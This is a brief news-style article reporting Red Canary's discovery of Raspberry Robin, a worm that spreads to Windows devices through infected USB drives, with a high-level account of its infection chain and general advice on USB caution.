USB Flash Drive Malware Is Violating Windows Devices. Researchers from Red Canary, a cybersecurity company, have recently discovered a new worm-like malware that is targeting Windows devices via infected USB drives. While the researchers did not provide a name for the specific malware, they did link it to a “cluster of malicious activity” that they named Raspberry Robin. The malware has been found in various endpoints belonging to organizations in the manufacturing and technology industries.
The researchers discovered that the worm spreads to new devices through a malicious link file that is triggered once an infected USB drive is plugged into a device. The worm then initiates a new process through cmd.exe and runs the file. The malware makes use of the Microsoft standard installer (msiexec.exe), which can be leveraged by adversaries to deliver malware. The researchers also discovered that the worm attempts to communicate with a malicious domain for C2 purposes.
However, the researchers are still unsure of the malware’s endgame. One hypothesis is that the malicious DLL that is installed by Raspberry Robin could be an attempt to establish persistence in the infected system. Nevertheless, further information is needed to confirm this theory.
The malware’s ability to spread offline through USB drives is a significant concern as it can easily infect other devices that connect to the same drive. It is also worrying that the malware is targeting organizations in the manufacturing and technology industries. These industries are critical infrastructures and can suffer severe consequences from a malware attack.
It is essential to note that USB drives are still widely used as a means of transferring files between devices, making them a prime target for cybercriminals. Therefore, it is crucial to exercise caution when using USB drives, especially those obtained from unknown sources.
In conclusion, the discovery of the Raspberry Robin malware highlights the ongoing threat of malware attacks on Windows devices. The malware’s ability to spread offline through USB drives and its targeting of critical infrastructure industries emphasizes the importance of remaining vigilant and implementing robust cybersecurity measures to prevent and mitigate such attacks.